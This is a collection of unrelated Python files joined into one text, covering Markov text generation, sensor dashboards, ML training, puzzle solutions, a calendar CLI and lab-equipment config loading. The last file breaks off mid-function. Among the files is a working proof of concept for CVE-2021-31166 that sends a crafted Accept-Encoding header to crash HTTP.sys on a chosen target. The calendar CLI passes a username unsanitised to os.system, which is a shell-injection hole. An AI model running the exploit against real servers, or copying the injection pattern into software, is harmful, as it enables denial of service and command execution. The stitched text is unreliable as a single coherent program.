# -*- coding: utf-8 -*-
"""
Created on Tue Jan 22 13:45:07 2019
DATA PRE-PROCESSING AND MARKOV MODEL
@author: Murphy
"""
import nltk as tk
from numpy.random import choice
# read in all text files to a string
unique_words = []
all_words = []
sentences = []
def loadText(filename):
clean = ""
with open(filename, "r",encoding='utf-8-sig') as f:
for line in f:
sentence = ""
words = line.split()
#pop off the date at the end of each line
words.pop()
words.pop()
words.pop()
#remove the links in each tweet
for word in words:
if "http" in word:
pass
else:
sentence = sentence + word + " "
clean = clean + word + " "
sentences.append(sentence)
all_words.extend(clean.split())
return clean
# LOAD AND PREPROCESS A DATA SET
loadText("economisttweets.txt")
#scan words to find number of distinct words
for word in all_words:
if word in unique_words:
n = 0
else:
unique_words.append(word)
p_start = [0.0] * len(unique_words)
num_unique_words = len(unique_words)
p_start_sum = 0
# find the start of each sentence and increase the count in p_start index
for sentence in sentences:
words = sentence.split()
start_word = words[0]
start_word_index = unique_words.index(start_word)
p_start[start_word_index] += 1
p_start_sum += 1
# turn p_start into probabilities by dividing value by sum
index = 0
while (index < len(p_start)):
p_start[index] /= p_start_sum
index += 1
#calculate probabilities that each word is before another word
# for each row, count each time every word(column) appears after it in all words
# divide each column by the sum of each row
first_order_matrix = [[0.0 for x in range(num_unique_words)] for y in range(num_unique_words)]
curr_word_index = 0
for word in all_words:
row_index = unique_words.index(word)
following_word_position = curr_word_index + 1
if following_word_position < len(all_words):
following_word = all_words[following_word_position]
col_index = unique_words.index(following_word)
first_order_matrix[row_index][col_index] += 1
curr_word_index +=1
for row in range(num_unique_words):
row_sum = sum(first_order_matrix[row])
for column in range(num_unique_words):
first_order_matrix[row][column] /= row_sum
def get_first_word():
return choice(unique_words, 1,
p=p_start)
def choose_word(current_word):
return (choice(unique_words, 1, p=first_order_matrix[unique_words.index(current_word)]))
def write_sentence(num_words):
sentence = get_first_word()[0]
curr_word = sentence
for i in range(num_words - 1):
new_word = choose_word(curr_word)[0]
sentence = sentence + " " + new_word
curr_word = new_word
return sentence
def write_sentence_with(start_word, length):
sentence = start_word
curr_word = sentence
for i in range(length - 1):
new_word = choose_word(curr_word)[0]
sentence = sentence + " " + new_word
curr_word = new_word
return sentence
def saveClean(filename):
with open(filename, "w", encoding='utf-8-sig') as f:
for line in sentences:
f.write("%s\n" % line)
# GENERATE A HEADLINE
write_sentence(10) |
"""
In de klasse meet_controller worden nieuwe Dashboardviews en eenheidControllers aangemaakt.
De master wordt hier doorgegeven aan Dashboardview. Alle waarden van het Dashboard worden hier opgevraagd
en maken met deze waarden het programma interactief.
Created: 10-11-2018
Author: Jeloambo
Version: 1.2.6
"""
from controller.eenheid_controller import *
from time import sleep
from view.Dashboardview import Dashboardview
from threading import Thread
class meetController:
def __init__(self, master):
"""
:initialiseren van all klas variabelen.
:param dashboard: hier wordt een nieuw Dashboardview aangemaakt en de master wordt meegegeven.
:param e: maakt een nieuwe eenheidController aan.
:param eemheden: haalt een list op van alle eenheden en de waarden daarvan.
:param createThread: met deze functie worden de threads aangemaakt
"""
self.dashboard = Dashboardview(master)
self.e = eenheidController()
self.eenheden = self.e.haal_eenheden()
self.createThread()
# stopt de waarden van de sensoren in de database
def sla_waarde_op(self):
for t in self.eenheden:
q = "INSERT INTO j_values (value, datetime, unit_id) VALUES (%s, CURRENT_TIMESTAMP, %s)"
p = (t.waarde, t.id)
self.e.db.insert(q, p)
# Maakt een thread aan per eenheid
def createThread(self):
self.threadtemp = Thread(target=self.loop_temperatuursensor)
self.threadtemp.setDaemon(True)
self.threadtemp.start()
self.threadlicht = Thread(target=self.loop_lichtsensor)
self.threadlicht.setDaemon(True)
self.threadlicht.start()
# Een loop voor het programma voor de temperatuursensor
def loop_temperatuursensor(self):
x = True
unit2 = self.eenheden[1]
y = 0
while x:
for i in range(0, 61):
print(y, "t")
if self.ontvang_temp_switch() == True:
self.automatisch()
else:
self.handmatig()
if y == self.ontvang_temp_frequentie() - 1:
unit2.stuur_sensor_waarde()
self.dashboard.temperatuursensor.grafiek.variabele = unit2.waarde
y = 0
sleep(1)
y += 1
sleep(1)
self.sla_waarde_op()
# Een loop voor het programma vam de lichtsensor
def loop_lichtsensor(self):
x = True
unit1 = self.eenheden[0]
while x:
for i in range(0, self.ontvang_licht_frequentie()):
print(i, "l")
if self.ontvang_licht_switch() == True:
self.automatisch()
else:
self.handmatig()
if i == self.ontvang_licht_frequentie() - 1:
unit1.stuur_sensor_waarde()
self.dashboard.lichtsensor.grafiek.variabele = unit1.waarde
sleep(1)
x = True
sleep(1)
"""
Haalt de bovengrens waarde op van het dashboard van de temperatuursensor
:return: de bovengrens van de temperatuursensor
"""
def ontvang_temp_bovengrens(self):
return self.dashboard.temperatuursensor.bovengrens
"""
Haalt de frequentie op van het dashboard van de temperatuursensor
:return: de frequentie van de temperatuursensor
"""
def ontvang_temp_frequentie(self):
return self.dashboard.temperatuursensor.frequentie
"""
Haalt de handmatig/automatische knop waarde op van het dashboard van de temperatuursensor
:return: de switch waarde van de temperatuursensor
"""
def ontvang_temp_switch(self):
return self.dashboard.temperatuursensor.switch
"""
Haalt de oprol/uitrol knop waarde op van het dashboard van de temperatuursensor
:return: de oprol/uitrol waarde van de temperatuursensor
"""
def ontvang_temp_oprollen(self):
return self.dashboard.temperatuursensor.oprollen
"""
Haalt de bovengrens waarde op van het dashboard van de lichtsensor
:return: de bovengrens van de lichtsensor
"""
def ontvang_licht_bovengrens(self):
return self.dashboard.lichtsensor.bovengrens
"""
Haalt de frequemtie waarde op van het dashboard van de lichtsensor
:return: de frequentie van de lichtsensor
"""
def ontvang_licht_frequentie(self):
return self.dashboard.lichtsensor.frequentie
"""
Haalt de handmatig/automatische knop waarde op van het dashboard van de lichtsensor
:return: de switch waarde van de lichtsensor
"""
def ontvang_licht_switch(self):
return self.dashboard.lichtsensor.switch
"""
Haalt de oprol/uitrol knop waarde op van het dashboard van de lichtsensor
:return: de oprol/uitrol waarde van de lichtsensor
"""
def ontvang_licht_oprollen(self):
return self.dashboard.lichtsensor.oprollen
# Wanneer het programma op automatisch staat, wordt hier gekeken naar de temperatuur en de bovengrens.
# om de rolluik automatisch open en dicht te laten gaan.
def automatisch(self):
unit1 = self.eenheden[0]
unit2 = self.eenheden[1]
if self.ontvang_licht_switch() == True:
if unit1.waarde > self.ontvang_licht_bovengrens():
unit1.open_scherm()
self.dashboard.lichtsensor.uitrollenFunc()
elif unit1.waarde <= self.ontvang_licht_bovengrens():
unit1.sluit_scherm()
self.dashboard.lichtsensor.oprollenFunc()
if self.ontvang_temp_switch() == True:
if unit2.waarde > self.ontvang_temp_bovengrens():
unit2.open_scherm()
self.dashboard.temperatuursensor.uitrollenFunc()
elif unit2.waarde <= self.ontvang_temp_bovengrens():
unit2.sluit_scherm()
self.dashboard.temperatuursensor.oprollenFunc()
# Wanneer het porgramma op handmatig staat, wordt hier gekeken wanneer er een knop wordt ingedrukt
# om de rolluik handmatig open en dicht te laten gaan.
def handmatig(self):
unit1 = self.eenheden[0]
unit2 = self.eenheden[1]
if self.ontvang_licht_switch() == False:
if self.ontvang_licht_oprollen() == True:
unit1.open_scherm()
else:
unit1.sluit_scherm()
if self.ontvang_temp_switch() == False:
if self.ontvang_temp_oprollen() == True:
unit2.open_scherm()
else:
unit2.sluit_scherm()
|
#encoding:gbk
# __file__平台在win32平台的值是完整路径
# 在linux平台是文件名
print __file__ |
# 导入必要的模块
from gcforest.gcforest import GCForest
def init():
x_train = []
y_train = []
x_test = []
y_test = []
for x in range(1, 3):
with open('./subfile_' + str(x) + '_train.csv', mode='r', encoding='utf8') as fpto_train:
lines = fpto_train.readlines()
for row in lines:
line = row.split(',')
y_train.append(line[0])
for col in line[1:]:
x_train.append(col)
with open('./subfile_' + str(x) + '_test.csv', mode='r', encoding='utf8') as fpto_test:
lines = fpto_test.readlines()
for row in lines:
line = row.split(',')
y_test.append(line[0])
for col in line[1:]:
x_test.append(col)
return x_train, y_train, x_test, y_test
def get_toy_config():
config = {}
ca_config = {}
ca_config["random_state"] = 0 # 0 or 1
ca_config["max_layers"] = 100 # 最大的层数,layer对应论文中的level
ca_config["early_stopping_rounds"] = 3 # 如果出现某层的三层以内的准确率都没有提升,层中止
ca_config["n_classes"] = 3 # 判别的类别数量
ca_config["estimators"] = []
ca_config["estimators"].append(
{"n_folds": 5, "type": "XGBClassifier", "n_estimators": 10, "max_depth": 5,
"objective": "multi:softprob", "silent": True, "nthread": -1, "learning_rate": 0.1} )
ca_config["estimators"].append({"n_folds": 5, "type": "RandomForestClassifier", "n_estimators": 10, "max_depth": None, "n_jobs": -1})
ca_config["estimators"].append({"n_folds": 5, "type": "ExtraTreesClassifier", "n_estimators": 10, "max_depth": None, "n_jobs": -1})
ca_config["estimators"].append({"n_folds": 5, "type": "LogisticRegression"})
config["cascade"] = ca_config # 共使用了四个基学习器
return config
def train():
# 初始化一个gcForest对象
gc = GCForest(get_toy_config()) # config是一个字典结构
# gcForest模型最后一层每个估计器预测的概率concatenated的结果
x_train, y_train, x_test, y_test = init()
X_train_enc = gc.fit_transform(x_train, y_train)
# 测试集的预测
y_pred = gc.predict(x_test)
if __name__ == '__main__':
init()
train()
|
from data_structures_algorth.challenge_stack_and_queue.stack_queue import Queue, QueueIsEmptyException
class AnimalShelter:
def __init__(self):
"""
will construct 2 objects cat and dog as instances of queue class
"""
self.dog = Queue()
self.cat = Queue()
def enqueue(self,animal):
"""
will check first if the animal wanted to be added dog or cat and according to that it will add the animal to the animal shelter"""
if animal == 'dog':
self.dog.enqueue('dog')
elif animal == 'cat':
self.cat.enqueue('cat')
else:
raise Exception('No other animals are allowed!!')
def dequeue(self,pref='none'):
"""
will check first if the animal wanted to be removed from the shelter is dog or cat and remove it from the shelter in accordance to first in first out """
#first check if the dog queue is not empty
if pref == 'dog':
if self.dog.front:
return self.dog.dequeue()
else:
raise QueueIsEmptyException('Sorry there are no dogs waiting in our shelter')
elif pref == 'cat':
if self.cat.front:
return self.cat.dequeue()
else:
raise QueueIsEmptyException('Sorry there are no cats waiting in our shelter')
else:
return None
if __name__== '__main__':
shelter = AnimalShelter()
shelter.enqueue('dog')
shelter.enqueue('dog')
shelter.enqueue('cat')
shelter.enqueue('cat')
print(shelter.dog.front.value)
print(shelter.dog.rear.value)
print(shelter.cat.front.value)
print(shelter.cat.rear.value)
shelter.dequeue('cat')
shelter.dequeue('cat')
# print(shelter.cat.front.value)
print(shelter.dequeue('cat')) |
import matplotlib
matplotlib.use('Agg')
import os
import datetime
import time
import sqlite3
import pywt
from pylab import *
import fnmatch, gzip, os, re, sys, time
def approx(x, wavelet, level):
ca = pywt.wavedec(x, wavelet, level=level)
ca = ca[0]
return pywt.upcoef('a', ca, wavelet, level, take=len(x))
if __name__=="__main__":
for (dirpath,dirnames,filenames) in os.walk('/home/apan/sqllite/ml00'):
print "*************************************************************************************************"
for _file in filenames:
if _file=="ml00_0_2011.db":
print "FOUND====>"+ dirpath+"/"+_file
cktstart=_file.find("_")
cktend=_file.rfind("_")
site=_file[0:cktstart]
print "site="+site
ckt=_file[cktstart+1:cktend]
print "circuit="+ckt
tableend=_file.rfind(".db")
_table=_file[0:tableend]
print "tablename="+_table
yrstart=_file.rfind("_")
yrend=_file.rfind(".")
yr=_file[yrstart+1:yrend]
try:
conn=sqlite3.connect(dirpath+"/"+_file)
c=conn.cursor()
prev="0123456789z"
curr=""
d=[]
#cmd="select ts,watts from hour_res_watts where ts between '2011-02-01' and '2011-02-28'"
cmd="select timestamp,watts from ml00_0_2011 where timestamp between '2011-02-01' and '2011-02-28' order by timestamp"
for (ts,w) in c.execute(cmd):
curr=str(ts)
if curr==prev:
print "WARNING: Duplicate timestamp detected:"+str(ts)
else:
d.append(w)
prev=curr
conn.close()
conn=None
except Exception,e:
print e
print "len(d)="+str(len(d))
coeffs=pywt.wavedec(d, 'db2', level=10)
print "len(cA)="+str(len(coeffs[0]))
#_d=approx(d,'db2',13)
#print "len(_d)="+str(len(_d))
#N=len(_d)
#t=arange(0,1,1./N)
#x=_d
#plot(t,x)
#ylim(0,max(_d))
#savefig('db2_signal_onemonthspan_level13from3secres.pdf')
|
# https://www.codewars.com/kata/54df2067ecaa226eca000229
def f(n):
if(isinstance(n, int) and n>0):
return round((1+n)*n/2)
else:
return None
|
from gurobipy import *
import numpy as np
def dist(loc, i, j):
return np.linalg.norm(np.array(loc[i])-np.array(loc[j]))
# Create a new model
m = Model("Minimizing the Maximum Within-Block Distance")
#locations of worksites
loc = [[277, 302], [340, 304], [432, 281], [463, 171], [467, 154], [573, 225], [481, 237]
, [455, 276], [501, 347], [417, 362], [367, 383], [366, 411], [472, 388], [476, 420], [563, 492],
[606, 334], [631, 367], [673, 405], [721, 374], [710, 401], [402, 482]]
s = len(loc)
# prespecify the number of clusters desired
k = 5
# Create binary variables
vv = m.addVars(s, k, vtype=GRB.BINARY)
dd = m.addVar(vtype = GRB.INTEGER, name = "minimax dist")
# Set Objective
obj = LinExpr(dd)
m.setObjective(obj, GRB.MINIMIZE)
# Add constraints
m.addConstr(dd, GRB.GREATER_EQUAL, 0)
for w in range(k):
for i in range(s):
for j in range(i+1, s):
expr = dist(loc, i, j)*(vv[i, w] + vv[j, w]) - dd
m.addConstr(expr, GRB.LESS_EQUAL, dist(loc, i, j))
for i in range(s):
expr = vv.sum(i, '*')
m.addConstr(expr, GRB.EQUAL, 1)
# Optimize model
m.optimize()
for v in m.getVars():
print('%s %g' % (v.varName, v.x))
print('Obj: %g' % m.objVal)
|
import torch
import VGG
from model import *
from datasets import *
from torchvision.utils import save_image,make_grid
import os
from PIL import Image
os.environ['CUDA_VISIBLE_DEVICES'] = "3"
def test(args):
# parameters
cont_img_path = args.cont_img_path
style_img_path = args.style_img_path
model_checkpoint = args.model_checkpoint
vgg_checkpoint = args.vgg_checkpoint
output_file = args.output_file
device = torch.device("cuda")
transform = transforms.Compose([
transforms.Resize((512, 512), Image.BICUBIC),
transforms.ToTensor()
])
cont_img = transform(Image.open(cont_img_path).convert('RGB'))
style_img = transform(Image.open(style_img_path).convert('RGB'))
low_cont = resize(cont_img, cont_img.shape[-1] // 2)
low_style = resize(style_img, style_img.shape[-1] // 2)
# initialize model and optimizer
vgg = VGG.vgg
vgg.load_state_dict(torch.load(vgg_checkpoint))
vgg = nn.Sequential(*list(vgg.children())[:31])
net = VGG.Net(vgg).to(device)
model = Model().to(device)
model.load_state_dict(torch.load(model_checkpoint))
cont_img = cont_img.to(device)
low_cont = low_cont.to(device)
low_style = low_style.to(device)
model.eval()
cont_feat = net.encode_with_intermediate(low_cont.unsqueeze(0))
style_feat = net.encode_with_intermediate(low_style.unsqueeze(0))
coeffs, output = model(cont_img.unsqueeze(0), cont_feat, style_feat)
save_image(output, output_file + 'output.jpg', normalize=True)
return
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description='Joint Bilateral learning')
parser.add_argument('--cont_img_path', type=str, required=True, help='path to content images')
parser.add_argument('--style_img_path', type=str, required=True, help='path to style images')
parser.add_argument('--vgg_checkpoint', type=str, default="./checkpoints/vgg_normalised.pth",
help='path to style images')
parser.add_argument('--model_checkpoint', type=str, required=True,
help='path to style images')
parser.add_argument('--output_file', type=str, default='./output/')
params = parser.parse_args()
print('PARAMS:')
print(params)
test(params) |
#绘制三角螺旋线
from mpl_toolkits import mplot3d
import matplotlib.pyplot as plt
import numpy as np
import pickle
f = open('pos_recoder_0.pkl', 'rb')
pos_recoder = pickle.load(f)
ax = plt.axes(projection='3d')
xdata = [a[0] for a in pos_recoder]
ydata = [a[1] for a in pos_recoder]
zdata = [-a[2] for a in pos_recoder]
ax.scatter(xdata, ydata, zdata, linewidths=1)
# #三维线的数据
# zline = np.linspace(0, 15, 1000)
# xline = np.sin(zline)
# yline = np.cos(zline)
# ax.plot3D(xline, yline, zline, 'gray')
# # 三维散点的数据
# zdata = 15 * np.random.random(100)
# xdata = np.sin(zdata) + 0.1 * np.random.randn(100)
# ydata = np.cos(zdata) + 0.1 * np.random.randn(100)
# ax.scatter(xdata, ydata, zdata, linewidths=zdata)
plt.show() |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-08-04 12:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assets', '0006_auto_20160801_1540'),
]
operations = [
migrations.RemoveField(
model_name='networkdevice',
name='firmware',
),
migrations.AddField(
model_name='server',
name='kernel',
field=models.CharField(blank=True, max_length=128, null=True, verbose_name='内核'),
),
migrations.AlterField(
model_name='idc',
name='contacts_phone',
field=models.IntegerField(verbose_name='联系人电话'),
),
]
|
"""
solution
['AX', 'AY', 'AZ', 'BX', 'BY', 'BZ', 'CX', 'CY', 'CZ']
"""
# 1.
result = [i**2 for i in range(1,101) if i %2 == 0]
print(result)
# 2.
string1 = 'ABC'
string2 = 'XYZ'
result = [c1+c2 for c1 in string1 for c2 in string2]
print(result) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
RESTful API Python 3 Flask server
"""
import os
import pretty_errors
from restapi.confs import PRODUCTION
from restapi.server import create_app
from restapi.utilities.logs import log
# Connection internal to containers, proxy handle all HTTPS calls
# We may safely disable HTTPS on OAUTHLIB requests
if PRODUCTION:
# http://stackoverflow.com/a/27785830/2114395
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
BIND_INTERFACE = "0.0.0.0"
#############################
# BE FLASK
app = create_app(name='REST_API')
if __name__ == "__main__":
log.debug("Server running (w/ {})", pretty_errors.__name__)
app.run(host=BIND_INTERFACE, threaded=True)
|
class AttributeDictionary(object):
def __init__(self, *args, **kwargs):
d = kwargs
if args:
d = args[0]
super(AttributeDictionary, self).__setattr__("_dict", d)
def __setattr__(self, name, value):
self[name] = value
def __getattr__(self, name):
if name in self.__dict__:
return self.__dict__[name]
try:
return self[name]
except KeyError:
raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, name))
def __setitem__(self, name, value):
self._dict[name] = self._convert_value(value)
def __getitem__(self, name):
return self._convert_value(self._dict[name])
def _convert_value(self, value):
if isinstance(value, dict) and not isinstance(value, AttributeDictionary):
return AttributeDictionary(value)
return value
def copy(self):
return self.__class__(self._dict.copy())
def update(self, *args, **kwargs):
self._dict.update(*args, **kwargs)
def items(self):
return self._dict.items()
def values(self):
return self._dict.values()
def keys(self):
return self._dict.keys()
def pop(self, *args, **kwargs):
return self._dict.pop(*args, **kwargs)
def get(self, *args, **kwargs):
return self._dict.get(*args, **kwargs)
def __repr__(self):
return self._dict.__repr__()
def __unicode__(self):
return self._dict.__unicode__()
def __str__(self):
return self._dict.__str__()
def __iter__(self):
return self._dict.__iter__()
def __getstate__(self):
return self._dict
def __setstate__(self, state):
super(AttributeDictionary, self).__setattr__("_dict", state)
|
# An O(n^2) solution
class Solution(object):
def removeDuplicateLetters(self, s):
"""
:type s: str
:rtype: str
"""
if s == '':
return ''
ord_a = ord('a')
# NOTE We redefine `s` here.
s = [ord(x) - ord_a for x in s]
counter = [0]*26
for x in s:
counter[x] += 1
rv = []
for i, c in enumerate(s):
if counter[c] is None:
# This character has been processed
continue
assert counter[c] >= 1
counter[c] -= 1
if counter[c] == 0:
# The current character is not removeable. We have no other
# choices.
rv.append(c)
counter[c] = None
continue
# The current character is removeable. We find the first character
# to the right of the current character such that it is NOT
# removeable and it is lexicographically larger than or equal to
# the current character. If there is a lexicographically smaller
# character in-between, than we will not remove the current
# character.
j = i + 1
smaller_found = False
while j < len(s):
c2 = s[j]
if counter[c2] is None:
# c2 has been processed, ignore it.
j += 1
continue
assert counter[c2] >= 1
if c2 < c:
# Found the smaller
smaller_found = True
break
# c2 >= c
if counter[c2] == 1:
# This character is not removeable and it is
# lexicographically larger/equal
break
counter[c2] -= 1
j += 1
# Recover the counts of character in s[i+1:j]
for k in range(i+1, j):
c2 = s[k]
if counter[c2] is not None:
counter[c2] += 1
if not smaller_found:
# Must use the current character
rv.append(c)
counter[c] = None
return ''.join(chr(x + ord_a) for x in rv)
from collections import Counter
# O(n) solution using stack
class StackSolution(object):
def removeDuplicateLetters(self, s):
""" The idea is that we scan the string from the left to right and
maintain a stack of characters. We try to keep the stack as
lexicographically ascending as possible (because lexicographically
ascending string is the "smallest" string).
"""
stack = []
counter = Counter(s)
used = set()
for x in s:
counter[x] -= 1
if x in used:
# Ignore the current character if it is already in the stack.
continue
while len(stack) and stack[-1] > x and counter[stack[-1]] != 0:
# The top of the stack is lexicographically larger than the
# current character, and we know that we will encounter this
# character again later (because ``counter[...]!=0``), so it is
# safe to pop it so that the lexicographical order is
# maintained as good as possible.
used.remove(stack.pop())
stack.append(x)
used.add(x)
return ''.join(stack)
def test():
for S in (Solution, StackSolution):
assert Solution().removeDuplicateLetters('bcabc') == 'abc'
assert Solution().removeDuplicateLetters('cbacdcbc') == 'acdb'
assert Solution().removeDuplicateLetters('ccacbaba') == 'acb'
|
def startCommand(bot, update):
bot.send_message(chat_id=update.message.chat_id, text='Привіт 👋🏿:, человек 😑 ')
|
import random
import string
robot_names = set()
class Robot:
def __init__(self):
random.seed()
self.name = self.generate_name()
def generate_name(self):
letters = ''.join(random.sample(string.ascii_uppercase, 2))
digits = ''.join(random.sample(string.digits, 3))
self.name = f'{letters}{digits}'
while self.name not in robot_names:
robot_names.add(self.name)
return self.name
def reset(self):
self.__init__()
|
# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse
def main():
parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
parser.add_argument('--target', required = True)
args = parser.parse_args()
r = requests.get(f'http://{args.target}/', headers = {
'Accept-Encoding': 'doar-e, ftw, imo, ,',
})
print(r)
main() |
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import datetime
import glob,pickle,random
import nagdefs as nd
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/calendar-python-quickstart.json
#SCOPES = 'https://www.googleapis.com/auth/calendar.readonly'
SCOPES = 'https://www.googleapis.com/auth/calendar'
CLIENT_SECRET_FILE = 'client_secret.json'
#APPLICATION_NAME = 'Google Calendar API Python Quickstart'
APPLICATION_NAME = 'NagMe'
def cli():
print("Welcome to the NagMe Command Line Interface.\n")
try:
user=pickle.load(open(".user","rb"))
print("Current user: "+user)
except:
user=raw_input("Enter a username: ")
fu = open(".user","wb")
pickle.dump(user,fu,1)
fu.close()
nagcal = nd.getCalendar(user=user)
creds = nd.get_credentials(user=user)
http = creds.authorize(httplib2.Http())
serv = discovery.build('calendar','v3',http=http)
cals = serv.calendarList().list().execute()['items']
for nc in cals:
if nc["id"]==nagcal["id"]:
cals.remove(nc)
try:
userprof = pickle.load(open("."+user,"rb"))
except:
userprof = nd.Profile(user,nagcal)
os.system("echo "+user+">>.profiles")
while True:
print("\nEnter one of the following commands:\n\n"+
"l : List all available calendars \n"+
"c : List currently-selected calendars \n"+
"s : Select calendars \n"+
"a : Add task \n"+
"u : Switch user \n"+
"q : Quit \n\n")
command = raw_input("Command: ")
if command=="c":
listscals(userprof.scals)
elif command=="l":
listcals(cals)
elif command=="s":
userprof.scals=selectcals(userprof.scals,cals)
userprof.save()
elif command=="a":
userprof.tasks.append(addtask(userprof.scals,nagcal,user))
userprof.save()
elif command=="u":
user = raw_input("Enter username: ")
fu = open(".user","wb")
pickle.dump(user,fu,1)
fu.close()
nagcal = nd.getCalendar(user=user)
creds = nd.get_credentials(user=user)
http = creds.authorize(httplib2.Http())
serv = discovery.build('calendar','v3',http=http)
cals = serv.calendarList().list().execute()['items']
for nc in cals:
if nc["id"]==nagcal["id"]:
cals.remove(nc)
print("\nWelcome, "+user)
try:
userprof = pickle.load(open("."+user,"rb"))
except:
userprof = nd.Profile(user,nagcal)
elif command=="q":
break
else:
print("I'm sorry, I didn't get that.")
def listcals(cals):
print("\nAvailable calendars:\n")
for n in range(0,len(cals)):
print('[%02d]'%n,cals[n]["summary"])
def listscals(scals):
print("\n")
if len(scals)>0:
print("Currently-selected calendars:")
for nc in scals:
print(nc["summary"])
else:
print("No calendars currently selected.")
def selectcals(scals,cals):
listcals(cals)
listscals(scals)
while True:
okstat = raw_input("Enter the number of the calendar you would"+
" like to add to the watch list, or hit 'Enter' to continue: ")
if okstat=='':
if len(scals)>0:
break
else:
print("You must select at least one calendar to continue.")
try:
ncal = int(okstat)
scals.append(cals[ncal])
listscals(scals)
print("\n")
except:
print("Invalid number entered. Please try again.")
return scals
def addtask(scals,nagcal,user):
tzh = int(round((datetime.datetime.utcnow()
-datetime.datetime.now()).total_seconds()/3600.0))
if tzh>0:
dtz = datetime.datetime(1970,1,1,0,0,0)-datetime.datetime(1970,1,1,abs(tzh),0,0)
else:
dtz = datetime.datetime(1970,1,1,abs(tzh),0,0)-datetime.datetime(1970,1,1,0,0,0)
name=raw_input("\nEnter a name for the task: ")
deadline = cliDialogT("Enter a deadline in the format YYYY-MM-DD/HH:MM:SS : ",dtz)
nid = cliDialogAB("Will advance notice be given in weeks (w) or days (d)? ","d","w")
nadv = cliDialogN("How many weeks or days in advance would you like to be notified?")
workweek = cliDialogAB("Weekdays okay? (y/n): ","y","n")
weekend = cliDialogAB("Weekends okay? (y/n): ","y","n")
if not workweek and not weekend:
print("You have to do it SOMETIME asshole, so you're getting weekend notifications.")
weekend=True
morns = cliDialogAB("Mornings okay? (y/n): ","y","n")
eves = cliDialogAB("Evenings okay? (y/n): ","y","n")
days = cliDialogAB("During the day okay? (y/n): ","y","n")
if not morns and not eves and not days:
print("You have to do it SOMETIME asshole, so you're getting evening notifications.")
eves=True
nfreq = cliDialogN("How many notifications per week would you like?")
print("Working....")
task = nd.Task(name,deadline,nadv,workweek=workweek,weekend=weekend,workday=days,
morning=morns,evening=eves,frequency_per_week=nfreq,notice_in_days=nid,
cals = scals,calendarId=nagcal["id"],user=user)
print("Filling your schedule.....")
task.assign()
print("Done!")
return task
def cliDialogAB(prompt,optionA,optionB):
ans = raw_input(prompt)
while True:
if ans==optionA:
outcome=True
break
elif ans==optionB:
outcome=False
break
else:
ans = raw_input("Please enter either "+optionA+" or "+optionB+": ")
return outcome
def cliDialogN(prompt):
print(prompt)
ans = raw_input("Enter a number: ")
while True:
try:
num = int(ans)
break
except:
ans = raw_input("Please enter a number: ")
return num
def cliDialogT(prompt,dtz):
timestring = raw_input(prompt)
while True:
try:
time = readinput(timestring,utcoffset=dtz)
break
except:
timestring = raw_input("Please enter a date in the correct format: ")
return time
def readinput(timestring,utcoffset=None):
date,time=timestring.split('/')
year,month,day = date.split('-')
hour,minute,sec = time.split(':')
year = int(year)
month = int(month)
day = int(day)
hour = int(hour)
minute = int(minute)
sec = int(sec)
dt = datetime.datetime(year,month,day,hour,minute,sec)
if utcoffset:
dt -= utcoffset
return dt
def unpackTime(timestring):
ts = timestring.split('T')
t0 = datetime.datetime(1970,1,1,0,0,0)
if len(ts[1].split('-'))>1:
tz = ts[1].split('-')[1].split(':')[0]
ts[1] = ts[1].split('-')[0]
t1 = datetime.datetime(1970,1,1,int(tz))
dtz = t0-t1
elif len(ts[1].split('+'))>1:
tz = ts[1].split('+')[1].split(':')[0]
ts[1] = ts[1].split('+')[0]
t1 = datetime.datetime(1970,1,1,int(tz))
dtz = t1-t0
else:
tz = '00'
t1 = t0
dtz = t1-t0
ts = 'T'.join(ts)
ndt = datetime.datetime.strptime(ts,"%Y-%m-%dT%H:%M:%S") - dtz #Go from local to UTC
return ndt
def schedule():
tasks = glob.glob("tasks/*.nag")
if __name__ == '__main__':
cli()
#s=Schedule(datetime.datetime(2018,4,13,12,0,0),datetime.datetime(2018,4,13,21,0,0)) |
# Handle Tecan Gemini Carriers and Racks
# Loads data from Carriers.cfg
import pprint
import os
import click
class Carrier(object):
instance = None
def __init__(self):
self.checksum=None
self.timestamp=None
self.username=None
self.carriers=[]
self.racks=[]
self.vectors=[]
self.data999=None
@classmethod
def cfg(cls):
"""Singleton instance of carriers """
if Carrier.instance is None:
modpath=os.path.dirname(__file__)
Carrier.instance = Carrier()
Carrier.instance.loadCFG(modpath+"/Carrier.cfg")
return Carrier.instance
def findrack(self,name):
"""Locate a rack by name"""
for r in self.racks:
if r["name"]==name:
return r
print(f"Rack with name {name} not found.")
return None
def findcarrier(self,name):
"""Locate a carrier by name"""
for c in self.carriers:
if c["name"]==name:
return c
print(f"Carrier with name {name} not found.")
return None
def getcarrier(self, carrierid):
"""Locate a carrier by id"""
for c in self.carriers:
if c["id"]==carrierid:
return c
print(f"Carrier with ID {carrierid} not found.")
return None
def print(self):
print(f"Checksum: {self.checksum}, Timestamp: {self.timestamp}, User: {self.username}")
print(f"Data999: {self.data999}")
print("Carriers:")
for c in self.carriers:
pprint.pprint(c)
print("\nRacks:")
for r in self.racks:
pprint.pprint(r)
print("\nVectors:")
for c in self.vectors:
pprint.pprint(c)
def loadCFG(self, filename):
with open(filename,"r") as fd:
self.checksum = fd.readline().strip()
self.timestamp = fd.readline().strip()
fd.readline() # Blank?
self.username = fd.readline().strip()
lineno=4
for line in fd:
lineno+=1
line=line.strip()
#print(f"line: {line}")
fields=line.split(";")
if fields[-1]=="":
fields=fields[:-1]
#print(f"{fields[0]}: {fields[1]} {len(fields)-2}")
if fields[0]=="999":
cont=[]
self.data999=fields[1:]
elif fields[0]=="13": # Carriers
cont=[]
carrier = {"name":fields[1],
"id":int(fields[2].split("/")[0]),
"barcode": int(fields[2].split("/")[1]),
"refoffset": [float(f)/10 for f in fields[3].split("/")],
"dimensions": [float(f)/10 for f in fields[4].split("/")],
"nsites": int(fields[5]),
"other":fields[7:],
"cont":cont}
carrier["romaonly"]=(carrier["barcode"]==0)
